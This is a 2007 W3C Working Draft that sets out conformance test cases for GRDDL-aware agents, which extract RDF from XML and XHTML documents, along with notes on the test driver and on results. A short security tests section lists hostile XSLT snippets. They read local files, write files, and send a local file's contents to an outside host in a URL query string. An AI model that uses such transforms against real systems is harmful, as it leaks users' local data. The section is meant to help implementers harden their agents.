Copyright © 2006-2007 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.
This document describes and includes test cases for software agents that extract RDF from XML source documents by following the set of mechanisms outlined in the Gleaning Resource Descriptions from Dialects of Languages [GRDDL] specification. The test cases demonstrate the expected behavior of a GRDDL-aware agent by specifying one (or more) RDF graph serializations which are the GRDDL results associated with a single source document.
This section describes the status of this document at the time of its publication. Other documents may supersede this document. A list of current W3C publications and the latest revision of this technical report can be found in the W3C technical reports index at http://www.w3.org/TR/.
This document reconciles tests from other documents in the repository (see Acknowledgements) as well as material from the editor's draft of the primer.
This is a Last Call Working Draft of the GRDDL Test Cases. This document was developed by the GRDDL Working Group, which was chartered in July 2006 to review the specification and develop use cases, tutorial materials, and tests.
This May 2nd 2007 release of the GRDDL specification is a Last Call Working Draft by the W3C GRDDL Working Group (part of the Semantic Web Activity) for review by W3C Members and other interested parties. The Working Group seeks confirmation that these tests adequately address all comments and that all these tests reflect and clarify all the issues in Gleaning Resource Descriptions from Dialects of Languages (GRDDL). Comments are due by 31 May 2007 to public-grddl-comments@w3.org (a mailing list with public archive). A log of changes is maintained for the convenience of editors and reviewers.
Publication as a Working Draft does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress.
This document was produced by a group operating under the 5 February 2004 W3C Patent Policy. W3C maintains a public list of any patent disclosures made in connection with the deliverables of the group; that page also includes instructions for disclosing a patent. An individual who has actual knowledge of a patent which the individual believes contains Essential Claim(s) must disclose the information in accordance with section 6 of the W3C Patent Policy.
A set of test cases is provided as part of the definition of [GRDDL]. This document presents those test cases. They are intended to provide examples for, and clarification of, the normative behavior of a GRDDL-aware agent. They should be used for testing the conformance of GRDDL-aware agents. The normative tests cover behavior expected of a GRDDL-aware agent. The informative tests demonstrate other permitted behavior with respect to the issues resolved by the Working Group. This document itself has (as a GRDDL result) a manifest describing the test cases in RDF. For convenience, serializations of the GRDDL result are available as RDF/XML and Turtle.
Note: the zip archive does not include tests which require network connectivity in order to properly calculate their GRDDL results.
This test collection uses an RDF vocabulary for manifests developed for the RDF Test Cases Recommendation. A GRDDL-aware agent can extract the test collection and automatically test compliance by attempting to reproduce the expected GRDDL result(s) associated with each test case. Some input documents have multiple output documents; see below.
We provide testft.py, a test driver, written in Python and based on rdflib 2.3.3. Run it a la:
$ python testft.py --run your_grddl_impl testlist1.rdf >earl_out.rdf
All tests were passed!
It has options for --debug and such; invoke it with no arguments (or with --help) for details:
Options:
  -r, --run     path to a GRDDL implementation to use to process the source document (checking results)
  -u, --update  path to a GRDDL Implementation to use to process the source document
  --tester      The URI of an agent associated with the EARL test assertions. A BNode is used if none is given
  --project     The URI of the EARL 'subject' (the implementation being tested). A BNode is used if none is given
  --local       A boolean flag (false by default) which indicates whether to run only the local tests
The tests do not require the use of this driver.
In addition to writing various diagnostic messages to STDERR, the test harness writes additional RDF data to STDOUT: an [EARL] test assertion about each test it runs.
To tell it about the person running the tests and the software project being tested, point it to a tester (a URI in a [FOAF] RDF graph) and a test subject (a URI in a [DOAP] RDF graph).
We find TCPWatch useful for debugging [HTTP] protocol interactions. If you start TCPWatch like so:
$ python tcpwatch.py -p 6543 &
then you can use it as a proxy:
$ http_proxy=http://127.0.0.1:6543 python testft.py --run your_grddl_impl testharness.rdf
A library of standard transforms is available for widespread use by authors.
The GRDDL specification states that any transformation identified by an author of a GRDDL source document will provide a Faithful Rendition of the information expressed in the source document. The specification also grants a GRDDL-aware agent the license to determine whether or not to apply a particular transformation, guided by user interaction, a local security policy, or the agent's capabilities. However, in defining these tests it was assumed that the GRDDL-aware agent being tested is using a security policy which does not prevent it from applying transformations identified in each test. Such an agent should produce the GRDDL result associated with each normative test, except as specified immediately below.
Certain tests have multiple GRDDL results as a direct consequence of Faithful Infoset considerations, information resources with multiple representations, and separate GRDDL mechanisms which produce distinct GRDDL results.
Tests of this kind can be considered as groups of N, where N is the number of valid GRDDL results for the common input document.
Testing GRDDL when XInclude processing is enabled and Testing GRDDL when XInclude processing is disabled are examples of tests which share the same source document, but have different XPath data models depending on whether any XInclude processing occurs. For such tests, a GRDDL-aware agent should output at least one of the GRDDL results associated with the single source document.
The test manifest includes a symmetric property [OWL] (http://www.w3.org/2001/sw/grddl-wg/td/grddl-test-vocabulary#alternative) asserted between such tests. A GRDDL-aware agent running the tests can take this into consideration.
Information resources can also have multiple representations in response to content negotiation. In addition to the GRDDL results associated with each representation, a test for the maximal result is included: the GRDDL result which consists of the merge of all possible GRDDL results.
Note, however, that the maximal result is not isomorphic with the other results. To aid a test harness in determining compliance for scenarios such as these, the tests have a property (http://www.w3.org/2001/sw/grddl-wg/td/grddl-test-vocabulary#subsumes) asserted from the test for the maximal result to the other tests in the group. A GRDDL-aware agent running the tests can take this into consideration.
The remaining set of tests with multiple results are those where there is no ambiguity with the XPath data model associated with the source document, there is a single representation, and multiple GRDDL mechanisms apply. In the absence of a policy which prevents each GRDDL result from being computed, a GRDDL-aware agent should produce the maximal result.
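The grouping described above can be sketched in a few lines of Python. This is only an illustration of one way a harness might treat a group of results, not the behavior of testft.py. It assumes graphs contain no blank nodes, so plain set equality stands in for a real graph isomorphism check; the triples and the names merge and matches_any are hypothetical.

```python
def merge(graphs):
    """Return the union of several graphs (each a set of triples)."""
    merged = set()
    for graph in graphs:
        merged |= set(graph)
    return frozenset(merged)


def matches_any(actual, expected_results):
    """True if the actual graph equals at least one expected result.

    Assumption: no blank nodes, so set equality is enough here.
    """
    actual = frozenset(actual)
    return any(actual == frozenset(expected) for expected in expected_results)


# Hypothetical results for one source document with two representations.
english = {("http://example.org/doc", "title", "Hello")}
german = {("http://example.org/doc", "title", "Hallo")}

# The maximal result is the merge of all possible results; it contains
# each of the other results but is not equal to either of them.
maximal = merge([english, german])

alternatives = [english, german, maximal]
print(matches_any(german, alternatives))
print(frozenset(english) < maximal)
```

A harness built along these lines would count an agent as passing the group when its output matches any member, and could use the containment check to recognize the maximal result.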
Every test has a URI of the form:
http://www.w3.org/2001/sw/grddl-wg/td/grddl-tests#LOCALNAME
The test collection can either be run locally (see "Localized Tests") or over a network. Certain tests are marked as requiring a network connection with an open circle as their list item marker. These tests are asserted as members of the http://www.w3.org/2001/sw/grddl-wg/td/grddl-test-vocabulary#NetworkedTest class in the test manifest. A GRDDL-aware agent running the tests can take this into consideration.
The tests which require a network connection use absolute URIs (in the test manifest) to refer to their test material (input and output) using the form:
http://www.w3.org/2001/sw/grddl-wg/td/LOCALNAME
Tests which do not require a network connection use relative URIs (in the test manifest) instead.
Each test has an input document and an output document. The output document is an RDF/XML document and represents a GRDDL result of the input document.
For the sake of convenience, this first set of normative tests covers simple scenarios where neither namespace documents nor absolute URIs are used. Such tests can run offline rather easily.
This test case exercises a single GRDDL transformation that is identified using the general XML markup from within the source document.
Approval: 2007-04-11
This test case exercises a single GRDDL transformation that is identified using the general XML markup from within a relatively complex source document.
Approval: 2007-04-11
This test case exercises a single GRDDL transformation that is identified using XHTML markup within the source document. Note that this test case uses a transformation for RDFa that reflects the status of RDFa markup as of the development of the test case.
Approval: 2007-04-11
This test case uses an inline GRDDL transformation reference (i.e. within an a element) instead of one within a link element. It also exercises the fact that the rel attribute can take multiple space-separated values, and only one of them needs to be equal to transformation to indicate that the resource is in fact a GRDDL transformation.
Approval: 2007-04-11
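The rule about space-separated rel values in the inline-reference test above can be illustrated with a short Python sketch. The function name is hypothetical, and the exact, case-sensitive token comparison is an assumption made for simplicity; an implementation may need different matching rules.

```python
def has_transformation_rel(rel_value):
    """True if one whitespace-separated token of rel is 'transformation'.

    Assumption: tokens are compared exactly (case-sensitively).
    """
    return "transformation" in rel_value.split()


print(has_transformation_rel("alternate transformation"))
print(has_transformation_rel("transformation"))
print(has_transformation_rel("transformations stylesheet"))
```

Splitting on whitespace before comparing avoids false matches on values that merely contain the substring, such as the last example.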
The base URI for the result document is the URI of the source document.
Approval: 2007-04-11
Approval: 2007-04-18
An XHTML file with the GRDDL profile is interpreted by applying the transformations included in links annotated with rel='transformation'.
Approval: 2007-04-18
An XHTML file with the GRDDL profile is interpreted by applying the transformations included in links annotated with rel='transformation', including links in the body of the document.
Approval: 2007-04-18
An XHTML file with the GRDDL profile present among other, non-GRDDL profiles is interpreted by applying the transformations included in links annotated with rel='transformation'.
Approval: 2007-04-25
An XHTML file with the GRDDL profile present is interpreted by applying the transformations included in all the links annotated with rel='transformation' and merging the resulting RDF/XML graphs.
Approval: 2007-04-25
An XML file - in this case, an SVG document - with the GRDDL attribute on the root element. SVG's namespace document is not in an XML format, which causes some implementations of GRDDL to fail.
Approval: 2007-04-18
These tests include the use of namespace documents and absolute URIs and are more difficult to run offline.
This test case exercises identifying GRDDL transformations using profileTransformation assertions. In this case, an XHTML document notes a profile URI to which it belongs. The profile document, retrieved from the URI, identifies a GRDDL transformation for the original document with a profileTransformation assertion in its own GRDDL result.
Approval: 2007-04-25
This test case exercises identifying GRDDL transformations using profileTransformation assertions from the GRDDL results of multiple XHTML profile documents.
Approval: 2007-04-25
The namespace document is an RDF document served with the media type application/xml.
Approval: 2007-04-25
This test case exercises identifying GRDDL transformations using namespaceTransformation assertions. In this case, an XML document has a root element with a namespace URI. The namespace document, retrieved from the URI, is an RDF/XML document (and so contributes to its own GRDDL results) and identifies a GRDDL transformation for the original document with a namespaceTransformation assertion.
Approval: 2007-04-18
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
This also has an in-body transformation, which has not been added to the root element.
Approval: 2007-04-18
This also has an in-body transformation on the root element.
Approval: 2007-04-25
This also has two in-body transformations on the root element.
Approval: 2007-04-18
Approval: 2007-04-25
An XHTML file with a profile whose interpretation through GRDDL gives a transformation for the said XHTML file.
Approval: 2007-04-25
The following tests are tests primarily of the library code.
A simple test for embedded RDF.
Approval: 2007-04-25
A test for embedded RDF, with two blocks of RDF.
Approval: 2007-04-25
A test for embedded RDF. A corner case: an RDF document.
Approval: 2007-04-25
A test for the glean profile, checking the treatment of spaces in the rel attribute.
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
This is from the final URI.
Approval: 2007-04-25
This is from a redirected URI.
Approval: 2007-04-25
This shows intended use of the profile.
Approval: 2007-04-25
These tests help check for robustness of implementations in the face of various odd cases.
Approval: 2007-04-25
In this test case, the input file uses XInclude to include xinclude2.xml. The output has only one triple unless the XML processor of the GRDDL implementation implements XInclude. The output for this case assumes that the processor does resolve XIncludes.
Approval: 2007-04-11
This test case is an alternative to the XInclude enabled test case. The output for this case assumes that the processor does not resolve XIncludes, which may lead to a different GRDDL result.
Approval: 2007-04-11
Note that the input is an RDF document with a GRDDL transformation, and that according to the rules given by the GRDDL Specification, there are three distinct and equally valid output graphs for this document. This output is a graph that is the merge of the graph given by the source document with the graph given by the result of the GRDDL transformation.
Approval: 2007-04-25
The rel attribute can take multiple values.
Approval: 2007-04-25
The layering tests permit arbitrary nesting (up to depth 9) of HTML profiles and XML namespaces. The general pattern is:
$V matching ((ns|pf)-){0,8}.
ns-$Vfnd is an XML document with namespace $Vfnd.
pf-$Vfnd is an XHTML document with profile $Vfnd.
fnd specifies appropriate transformations, so that every possible stack has GRDDL results. These are all different.
fnd-$Voutput.srdf is the correct answer.
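To make the naming pattern concrete, the following Python sketch enumerates every prefix that $V can take and checks each against the regular expression, reading the quantifier as zero to eight repetitions. It only illustrates the pattern; the helper name is hypothetical and the sketch does not claim that every generated name exists in the test collection.

```python
import re
from itertools import product

# $V: zero to eight repetitions of "ns-" or "pf-".
PREFIX = re.compile(r"((ns|pf)-){0,8}")


def prefixes(max_depth=8):
    """Yield every string made of 0..max_depth 'ns-'/'pf-' segments."""
    for depth in range(max_depth + 1):
        for combo in product(("ns", "pf"), repeat=depth):
            yield "".join(part + "-" for part in combo)


all_prefixes = list(prefixes())

# Document names following the pattern, e.g. for $V = "pf-ns-".
v = "pf-ns-"
print("ns-" + v + "fnd")  # an XML document whose namespace is $Vfnd
print("pf-" + v + "fnd")  # an XHTML document whose profile is $Vfnd
print(len(all_prefixes))
```

Adding the leading ns- or pf- segment to a prefix of up to eight segments gives the maximum nesting depth of nine mentioned above.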
An HTML document which has a profile being an HTML document, which has a profile being an HTML document, which has a profile being an XML document, which has an RDF namespace document.
Approval: 2007-04-18
An XML document which has an XML namespace document, which has an HTML namespace document, which has a profile being an HTML document, which has a profile being an RDF document.
Approval: 2007-04-18
An XML document which has an HTML namespace document, which has a profile being an XML document, which has an HTML namespace document, which has a profile being an XML document, which has an RDF namespace document.
Approval: 2007-04-18
The following four tests demonstrate GRDDL results for a self-referencing input document. Unlike other tests of this kind, the last of these - the maximal result - is not exclusive. This reflects an interpretation of SHOULD as used in section 7. GRDDL-Aware Agents of [GRDDL] with regard to the computation of GRDDL results. In particular, this interpretation and the text in the section that follows (8. Security considerations) permit an implementation to pass only the first test due to security restrictions against computing recursive GRDDL results.
For this particular test, an XML document is its own namespace document, with a GRDDL transformation, specifying a namespaceTransformation, which specifies a further namespaceTransformation. This result is the first possible GRDDL result. Implementations that make no allowance for such cases may produce this result. Document authors are advised against having information resources whose GRDDL results depend on other GRDDL results for the same resource.
Approval: 2007-04-25
An XML document is its own namespace document, with a GRDDL transformation, specifying a namespaceTransformation, which specifies a further namespaceTransformation. This result is the merge of the first two possible GRDDL results. Implementations that make no special allowance for or prohibition of such cases may produce this result. Document authors are advised against having information resources whose GRDDL results depend on other GRDDL results for the same resource.
Approval: 2007-04-25
An XML document is its own namespace document, with a GRDDL transformation, specifying a namespaceTransformation, which specifies a further namespaceTransformation. This result is the merge of the first three possible GRDDL results. Implementations that make no special allowance for or prohibition of such cases may produce this result. Document authors are advised against having information resources whose GRDDL results depend on other GRDDL results for the same resource.
Approval: 2007-04-25
An XML document is its own namespace document, with a GRDDL transformation, specifying a namespaceTransformation, which specifies a further namespaceTransformation. This result is the merge of all possible GRDDL results. Document authors are advised against having information resources whose GRDDL results depend on other GRDDL results for the same resource.
Approval: 2007-04-25
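The relationship between the four results above (the first result, then successive merges, ending with the merge of all results) can be pictured as a running union. The Python sketch below is only an illustration under simplifying assumptions: graphs are sets of ground triples, and the individual results, including how many there are, are invented for the example.

```python
from itertools import accumulate


def cumulative_merges(results):
    """Return [r1, r1+r2, r1+r2+r3, ...] as a list of frozensets."""
    return [frozenset(g) for g in accumulate(results, lambda a, b: a | b)]


# Hypothetical individual GRDDL results for a self-referencing document.
individual = [
    {("doc", "p", "first")},
    {("doc", "p", "second")},
    {("doc", "p", "third")},
    {("doc", "p", "fourth")},
]

merges = cumulative_merges(individual)

# An agent that refuses to compute recursive results stops at merges[0];
# an agent that computes everything reaches merges[-1], the maximal result.
print(len(merges[0]), len(merges[-1]))
```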
Two transforms apply to this document, following rules in both sections 2 and 4 of the specification.
Approval: 2007-04-25
An XHTML file with a profile whose interpretation through GRDDL gives a transformation for the said XHTML file; the document also specifies the GRDDL profile, and a transformation.
Approval: 2007-04-25
An XHTML file with a profile whose interpretation through GRDDL gives a transformation for the said XHTML file; the document also specifies a transformation, but omits to specify the GRDDL profile.
Approval: 2007-04-25
This test differs from the previous example of applying GRDDL to an RDF/XML document in that the RDF file is served (not best practice, but rather common) as media-type "application/xml". The output is a graph that is the merge of the graph given by the source document with the graph given by the result of the GRDDL transformation.
Approval: 2007-04-18
This test exists to draw developers' attention to issues of content negotiation, in particular content negotiation over language as described and implemented by W3C QA. There are two valid GRDDL results of running this GRDDL transformation, depending on what language the GRDDL-aware agent uses, and an implementation of a GRDDL-aware agent only needs to retrieve the one that is appropriate for its HTTP header request. This result follows from retrieving an English version of the HTML representation, so that the GRDDL result contains English-language content.
Approval: 2007-04-25
This result follows from retrieving a German version of the HTML representation, so that the GRDDL result contains German-language content.
Approval: 2007-04-25
A GRDDL-aware agent may retrieve both representations, for example, by using transparent content negotiation. This GRDDL result is the merge of the previous two.
Approval: 2007-04-25
This test gives the GRDDL result of the HTML representation.
Approval: 2007-04-25
This test gives the GRDDL result of the SVG representation.
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
Approval: 2007-04-25
This test case exercises resolution of relative references found in the GRDDL results for a general XML document. In this case, according to RFC 3986, section 5.1, a base URI for the relative reference is recursively discovered on the encapsulating entity for the GRDDL results, which is the root element of the input document, in order to maintain fidelity to the faithful rendition requirement. The root element assigns the base URI using the mechanism described in XML Base.
Approval: 2007-04-27
This test case exercises resolution of relative references found in the GRDDL results for a general XML document. In this case, according to RFC 3986, section 5.1, a base URI for the relative reference is recursively discovered to be the URI used to retrieve the input document, since no base URI is assigned in the content of the encapsulating entity (that is, the root element of the input document).
Approval: 2007-04-27
This test case exercises resolution of relative references found in the GRDDL results for a general XML document when that document is resolved through a protocol redirection mechanism. The base URI for these relative references is established by the xml:base attribute on the root element, as for "An xml document with an xml:base attribute".
Approval: 2007-04-27
This test case exercises resolution of relative references found in the GRDDL results for a general XML document when that document is resolved through a protocol redirection mechanism. The base URI of the document is the target URI of the last redirection step; after establishing this fact, this test case follows the same behavior as "A similar xml document without an xml:base attribute".
Approval: 2007-04-27
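The base URI rules exercised by the four tests above can be summarized in a short Python sketch using the standard library's RFC 3986 style resolution. It assumes the agent already knows the URI actually used to retrieve the document (after any redirects) and the value of xml:base on the root element, if present; the function names and example URIs are hypothetical.

```python
from urllib.parse import urljoin


def effective_base(retrieval_uri, xml_base=None):
    """Base URI for the GRDDL result.

    xml:base on the root element wins when present; otherwise the URI
    used to retrieve the document (the final URI after redirection).
    """
    if xml_base is None:
        return retrieval_uri
    # xml:base may itself be relative, so resolve it first.
    return urljoin(retrieval_uri, xml_base)


def resolve(reference, retrieval_uri, xml_base=None):
    """Resolve a relative reference found in the GRDDL result."""
    return urljoin(effective_base(retrieval_uri, xml_base), reference)


# Hypothetical URIs, for illustration only.
final_uri = "http://example.org/final/doc.xml"
print(resolve("data#me", final_uri))
print(resolve("data#me", final_uri, xml_base="http://example.com/base/"))
```

In the redirected cases, the only difference is which URI is passed as the retrieval URI: the target of the last redirection step rather than the URI originally requested.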
This section includes material from the [Primer].
This test demonstrates the ability to use GRDDL to transform from HL7 CDA to a medical record ontology. Derived from use case and primer material.
Approval: 2007-04-18
This section includes tests that are not covered explicitly by the normative text of the GRDDL specification but that demonstrate additional behavior a GRDDL-aware agent may exhibit. They reflect behavior suggested by the Working Group as a result of resolving certain issues.
This test demonstrates an informative resolution to the issue-output-formats issue with an XSLT GRDDL transformation which outputs a [TURTLE] RDF graph serialization associated with an appropriate media-type (text/rdf+n3) via XSLT's output element.
approval: 11 April telecon
An XSL transform may have output in an unknown media type. In this test, it is assumed that the GRDDL-aware agent being tested does not know how to parse x-no-such-type/x-no-such-subtype documents.
Approval: 2007-04-18
The following security tests are provided for implementers to adapt and use for their implementation. Security issues are usually system specific, and it may be possible for a malicious party to access XSLT version and vendor information concerning a specific GRDDL agent instance.
We do not provide instructions on how to test your system against these tests, since they are likely not to be directly applicable. Developers of GRDDL-aware agents are encouraged to understand these tests, and to consider how their own systems may have potential security weaknesses.
document('file:///temp/local.txt')
document('http://www.w3.org/')
<xsl:result-document href="file:///temp/a.txt">
<xsl:value-of select="document( concat( 'http://www.w3.org/?', encode-for-uri( unparsed-text('file:///temp/local.txt') ) ) )" />
rdf:resource="security6.sxsl?{system-property('user.home')}"
This uses a Saxon extension to the XSLT system-property function.
The editor gratefully acknowledges the contributions of the following Working Group members and personnel:
The security tests were created during the development of the Jena GRDDL Reader, which uses the Saxon 8.8 XSLT processor. They therefore illustrate how a malicious party may try to abuse features of such an implementation.
Changes since the Working Group's decision to publish on 7 March:
$Log: Overview.html,v $ Revision 1.5 2018/10/09 13:17:29 denis fix validation of xhtml documents Revision 1.4 2017/10/02 10:34:38 denis add fixup.js to old specs Revision 1.3 2007/05/03 16:59:38 jean-gui fixing links Revision 1.42 2007/05/03 16:47:55 cogbuji fixed #changelog anchor Revision 1.41 2007/05/03 16:40:34 cogbuji fixed anchor links to GRDDL reference Revision 1.40 2007/05/03 16:35:10 cogbuji fixed more broken links Revision 1.39 2007/05/03 14:49:25 cogbuji fixed broken links Revision 1.38 2007/04/30 15:56:16 cogbuji changed per thread on #xmlbase3. See: http://lists.w3.org/Archives/Public/public-grddl-wg/2007Apr/0266.html Revision 1.37 2007/04/30 15:42:38 cogbuji removed base-detail. See: http://lists.w3.org/Archives/Public/public-grddl-wg/2007Apr/0264.html Revision 1.36 2007/04/28 05:24:57 cogbuji removed bad css color Revision 1.35 2007/04/28 04:57:03 cogbuji fixed date Revision 1.32 2007/04/28 04:43:26 cogbuji fixed pubrules violations and merged conflicts Revision 1.31 2007/04/27 22:36:20 hhalpin updated status text, removed embeddedrdf-4 approval Revision 1.30 2007/04/27 20:07:33 cogbuji added text for xmlbase1-4 Revision 1.29 2007/04/27 19:12:44 cogbuji fixed correct output for xmlbase2 and xmlbase4 Revision 1.28 2007/04/27 15:22:20 cogbuji fixed output files for xmlbase1-4 tests Revision 1.27 2007/04/27 15:01:34 cogbuji - changed all test input/output to absolute URIs - updated approval indications - removed tests per WG decision (httpHeaders and primer-hotel-data) - added base-detail Revision 1.26 2007/04/25 14:20:41 cogbuji well-formedness-fixes Revision 1.25 2007/04/25 05:59:18 cogbuji removed obsolete todos Revision 1.24 2007/04/25 05:50:38 cogbuji added ack for Dom.. 
Revision 1.23 2007/04/25 03:39:25 cogbuji fixed CSS class for network test (requires .htaccess magic) Revision 1.22 2007/04/25 02:48:29 cogbuji fixed double ref-WEBARCH, removed incorrect approval citation, fixed test li id syntax, added networked tests Revision 1.21 2007/04/23 16:57:46 cogbuji - moved in fixed versions of missing tests - removed use of 'will' Revision 1.20 2007/04/23 16:23:34 cogbuji - added text to tests (from john-l suggestions) - synched in commentary from jeremy - added missing tests - moved in additional tests from the pending list - updated approved tests Revision 1.19 2007/04/16 20:03:31 cogbuji - updated multiple output section to clarify the 3 kinds of multiple output scenarios - removed background color for approved test links - added approval links for tests approved during 4/11 teleconference - Collapsed single infoset / representation multiple output tests into maximal result Revision 1.18 2007/04/09 22:09:03 cogbuji - added CSS hooks for maximal result tests - added security tests section - clarifications to multiple output section - removed three-transforms Revision 1.17 2007/04/08 05:23:37 cogbuji - Minor editorial fixes - added note about Primer editorial draft material - moved library tests to normative section - added primer material test section - updated documentation for testft.py (--local option) - fixed links to GRDDL spec LC draft - shrunk multiple output diagram and floated left - removed uneccessary 'should's - fixed input link to loop instead of loop.xml (see result) - added primer material section - informative link to primer Revision 1.16 2007/04/06 20:32:42 cogbuji xhtmlWithGrddlEnabledProfile properly marked as a NetworkedTest (and movd appropriately) Revision 1.15 2007/04/06 19:29:27 cogbuji Fixed erroneous text about (and proper generation of) g:alternative and added further text using an explicit example to demonstrate multiple outputs and their effect on compliance. 
Revision 1.14 2007/04/06 18:11:40 cogbuji Fixes towards WG actions: - migrated all remaining tests from testlist* and pendinglist - added CSS styling for test approval and network tests - moved hcarda (networked test) - removed WD indications - added text for naming conventions and use of NetworkedTest and alternative in test manifest Revision 1.13 2007/04/05 04:42:48 cogbuji Moved in most of remaining tests from repository. Added editorial todos / notes. Added clear indication that this is an editors draft. Revision 1.12 2007/04/04 15:50:36 cogbuji removed indication of WD (commented styling to that effect) Revision 1.11 2007/03/27 23:28:43 cogbuji fixed patent policy link Revision 1.10 2007/03/24 19:25:06 cogbuji more pubrules fixes: ids for references headings, fixed cascade of css Revision 1.9 2007/03/24 05:48:34 cogbuji removed recursive log directive Revision 1.8 2007/03/24 05:45:47 cogbuji fixed change log link and added retrospective change log entries Revision 1.7 2007/03/24 05:42:42 cogbuji fixed changelog entries Revision 1.6 2007/03/24 05:09:36 cogbuji; fixed broken links to manifest files Revision 1.5 2007/03/24 04:59:19 cogbuji added SOTD and fixed css for WD (per pubrules) Revision 1.4 2007/03/24 04:39:30 cogbuji various XHTML validity modifications, synched up with deprecated doc50/grddl-tests.html (which was subject of WG approval), and other pre-transtion pubrules checks